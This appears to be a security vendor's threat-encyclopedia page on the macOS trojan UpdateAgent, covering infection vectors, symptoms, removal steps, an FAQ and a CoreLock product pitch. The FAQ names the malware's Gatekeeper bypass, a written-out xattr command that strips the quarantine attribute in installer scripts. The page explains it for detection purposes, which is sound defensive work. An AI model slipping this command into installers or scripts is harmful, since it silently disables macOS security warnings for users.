UpdateAgent is a trojan targeting macOS, first discovered in 2020. UpdateAgent is a macOS trojan that has evolved significantly since its discovery, gaining the ability to bypass macOS Gatekeeper protections. It masquerades as legitimate software such as video apps or support agents and tricks users into installing it. Once active, UpdateAgent can deploy additional malware payloads including adware like Adload, harvest system information, and modify the LaunchAgent folder for persistence. Microsoft's threat intelligence team tracked its evolution across multiple versions, each adding more sophisticated evasion techniques including the ability to abuse legitimate cloud services for payload hosting. CoreLock detects this threat using CoreLock detects UpdateAgent by monitoring for Gatekeeper bypass techniques, flagging preinstall and postinstall scripts in .pkg installers that execute suspicious commands, identifying outbound connections to cloud storage services used for secondary payload delivery, and applying YARA rules matching known UpdateAgent binary patterns across its multiple evolution stages.
Also known as: OSX.UpdateAgent, WizardUpdate, Silver Toucan
UpdateAgent is a macOS trojan that has evolved significantly since its discovery, gaining the ability to bypass macOS Gatekeeper protections. It masquerades as legitimate software such as video apps or support agents and tricks users into installing it. Once active, UpdateAgent can deploy additional malware payloads including adware like Adload, harvest system information, and modify the LaunchAgent folder for persistence. Microsoft's threat intelligence team tracked its evolution across multiple versions, each adding more sophisticated evasion techniques including the ability to abuse legitimate cloud services for payload hosting.
Drive-by downloads from malicious or compromised websites disguised as legitimate application updates
Fake software installers for video tools, productivity apps, and tech support utilities
Malvertising campaigns on popular websites that redirect to trojanized download pages
Bundled with legitimate-looking .pkg installers that use preinstall and postinstall scripts to deploy the trojan
Unexpected adware or browser hijacking appearing after installing a new application
New LaunchAgent plist files in ~/Library/LaunchAgents/ with random or unfamiliar names
Outbound network connections to Amazon S3, CloudFront, or other cloud storage services downloading unknown payloads
System Preferences showing new configuration profiles you did not install
Check /Applications/ and ~/Downloads/ for recently installed unfamiliar applications. Delete any apps you don't recognize or that you installed just before symptoms appeared.
In Terminal, list LaunchAgents: ls -la ~/Library/LaunchAgents/ and ls -la /Library/LaunchAgents/. Delete any plist files with random names or that reference unfamiliar executables. Check the ProgramArguments key in suspicious plists with: plutil -p <filename>.plist
Go to System Settings > Privacy & Security > Profiles (or System Preferences > Profiles on older macOS). Remove any profiles you did not install. UpdateAgent can install profiles to enforce browser or proxy settings.
UpdateAgent frequently deploys Adload as a secondary payload. Check for Adload persistence: look for files in /Library/Application Support/ with random folder names and browser extensions you did not install.
Remove unfamiliar browser extensions from Safari (Settings > Extensions), Chrome (chrome://extensions), and Firefox (about:addons). Reset homepage and search engine if they were changed.
Run a full CoreLock scan to detect UpdateAgent components, any secondary payloads it deployed, and residual persistence mechanisms that manual cleanup may have missed.
Only download software from the Mac App Store or verified developer websites
Be skeptical of applications that require you to right-click and Open to bypass Gatekeeper warnings
Keep macOS updated — Apple continuously improves Gatekeeper and XProtect to detect UpdateAgent variants
Use CoreLock to monitor for Gatekeeper bypass attempts and unauthorized payload downloads from cloud services
Real-time Detection
CoreLock detects UpdateAgent by monitoring for Gatekeeper bypass techniques, flagging preinstall and postinstall scripts in .pkg installers that execute suspicious commands, identifying outbound connections to cloud storage services used for secondary payload delivery, and applying YARA rules matching known UpdateAgent binary patterns across its multiple evolution stages.
Check which apps have camera access on your Mac and revoke access you didn't approve.
Check which apps have microphone access on your Mac and revoke access you didn't approve.
Check which apps have screen recording on your Mac and revoke access you didn't approve.
UpdateAgent evolved to bypass Gatekeeper by removing the quarantine attribute from downloaded files using the xattr -d com.apple.quarantine command in its installer scripts. This prevents macOS from showing the standard security warning when users open downloaded applications. Some variants also exploit .pkg installer scripts that execute with elevated privileges before Gatekeeper checks are applied.
Signs include unexpected adware appearing on your Mac, unfamiliar browser extensions, new configuration profiles in System Settings, and unknown LaunchAgent files. If you recently installed an app and then started seeing ads, pop-ups, or browser hijacking, UpdateAgent may have installed adware like Adload as a secondary payload. Check Activity Monitor for unfamiliar processes and run a CoreLock scan.
UpdateAgent primarily deploys adware payloads, with Adload being the most common secondary payload. It downloads these payloads from legitimate cloud services like Amazon S3 and CloudFront, making network-based detection harder. Some variants have also deployed browser hijackers and data collection tools. The modular design means new payloads can be swapped in by the operators.
No. UpdateAgent has no connection to Apple's legitimate macOS Software Update mechanism. The name refers to the malware's strategy of disguising itself as an update utility. Legitimate macOS updates only come through System Settings > Software Update or the Mac App Store. Any application claiming to be a system update downloaded from a website is suspicious.
Download CoreLock to detect and remove UpdateAgent and other macOS threats. AI-powered analysis, real-time monitoring, and one-click remediation.
Download CoreLock FreeAvailable for macOS and Windows